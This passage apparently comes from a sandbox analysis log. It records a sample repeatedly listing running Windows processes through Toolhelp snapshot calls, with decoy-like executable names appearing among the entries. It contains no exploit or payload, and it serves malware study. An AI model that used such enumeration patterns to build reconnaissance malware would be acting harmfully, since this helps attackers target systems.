pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.756] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, 
th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.757] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.758] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.759] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.760] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.761] CloseHandle (hObject=0xc4) returned 1 [0129.761] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0129.766] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0129.767] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 
[0129.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0129.768] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.769] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0129.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0129.770] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0129.771] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0129.772] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0129.772] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0129.773] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.774] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.775] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.776] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0129.777] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.778] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0129.780] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.781] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.782] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0129.783] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0129.785] 
Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0129.808] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.809] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0129.810] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0129.811] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0129.813] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0129.814] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, 
szExeFile="xplivecam.exe")) returned 1 [0129.815] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0129.816] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0129.818] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0129.819] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0129.820] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0129.821] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0129.822] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, 
dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0129.823] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0129.824] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0129.825] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0129.826] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0129.827] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0129.829] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0129.830] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, 
th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0129.831] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0129.832] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0129.833] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0129.834] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0129.835] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0129.836] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0129.837] CloseHandle (hObject=0xbc) returned 1 [0129.837] Sleep (dwMilliseconds=0x12c) [0130.167] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0130.171] 
Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0130.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0130.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0130.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0130.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0130.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0130.176] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0130.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0130.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0130.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.180] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0130.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.183] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0130.184] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.185] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.186] Process32NextW (in: 
hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0130.188] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0130.189] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0130.190] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0130.191] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0130.193] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, 